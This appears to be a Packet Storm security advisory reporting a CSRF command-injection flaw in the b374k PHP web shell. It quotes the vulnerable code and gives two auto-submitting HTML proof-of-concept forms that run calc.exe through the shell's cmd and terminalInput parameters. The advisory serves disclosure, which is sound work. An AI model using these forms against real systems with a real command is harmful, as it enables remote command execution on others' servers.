what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

b374k 3.2.3 2.8 CSRF / Command Injection

b374k 3.2.3 2.8 CSRF / Command Injection
Posted Nov 13, 2015
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

b374k web shell versions 2.8 and 3.2.3 suffer from a cross site request forgery vulnerability that allows for remote command injection.

tags | exploit, remote, web, shell, csrf
SHA-256 | 7a3f5f494c2b27e756fd6b73c4b14796921e7612b045ce5d5b218e90626c8178

b374k 3.2.3 2.8 CSRF / Command Injection

Change Mirror Download
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
https://hyp3rlinx.altervista.org/advisories/AS-B374K-CSRF-CMD-INJECTION.txt



Vendor:
============================================
github.com/b374k/b374k
code.google.com/p/b374k-shell/downloads/list
code.google.com/archive/p/b374k-shell/



Product:
==============================================
b374k versions 3.2.3 and 2.8

b374k is a PHP Webshell with many features such as:

File manager (view, edit, rename, delete, upload, download as archive,etc)
Command execution, Script execution (php, perl, python, ruby, java,
node.js, c)
Give you shell via bind/reverse shell connect
Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more
using ODBC or PDO)
Process list/Task manager.

This is useful for system/web admin to do remote management without opening
cpanel, connecting using ssh,
ftp etc. All actions take place within a web browser.

Note:
b374k is considered by some as a malicious backdoor and is flagged by some
AV upon download.


Vulnerability Type:
=============================
CSRF Remote Command Injection




Vulnerability Details:
=====================

No CSRF protection exists in b374k Web Shell allowing arbitrary OS command
injection, if currently
logged in user visits our malicious website or clicks our infected linxs.

vulnerable b374k code:

<?php
if(isset($_GP['cmd'])) <------ $_GP holds value of $_GET passed to the
shell.

<form action='<?php echo $s_self; ?>' method='post'>
<input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd'
style='width:70%;' value='<?php
if(isset($_GP['cmd'])) echo "";

else echo "- shell command -";
?>' />
<noscript><input class='inputzbut' type='submit' value='Go !'
name='submitcmd' style='width:80px;' /></noscript>

</form>


Exploit code(s):
=================

Run Windows calc.exe as POC...

[CSRF Command Injections]

v3.2


Adding password and packing to b374k single PHP file.

c:\xampp\htdocs\b374k-master>php -f index.php -- -o myshell.php -p abc123
-s -b -z gzcompress -c 9
b374k shell packer 0.4.2

Filename : myshell.php
Password : xxxxxx
Theme : default
Modules : convert,database,info,mail,network,processes
Strip : yes
Base64 : yes
Compression : gzcompress
Compression level : 9
Result : Succeeded : [ myshell.php ] Filesize : 111419


(CSRF Command injection 1)

<form id='ABYSMALGODS' action='
https://localhost/b374k-master/myshell.php?run=convert,database,info,mail,network,processes'
method='post'>
<input id='cmd' type='text' name='terminalInput' value='calc.exe' />
<script>document.getElementById('ABYSMALGODS').submit()</script>
</form>



v2.8

(CSRF Command injection 2)

<form id='HELL' action='https://localhost/b374k-2.8.php?' method='post'>
<input id='cmd' type='text' name='cmd' value='calc.exe' />
<script>document.getElementById('HELL').submit()</script>
</form>


Exploitation Technique:
=======================
Remote




Severity Level:
===============
High




Description:
==================================================

Request Method(s): [+] POST


Vulnerable Product: [+] b374k 3.2 and 2.8


Vulnerable Parameter(s): [+] terminalInput, cmd


Affected Area(s): [+] OS



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close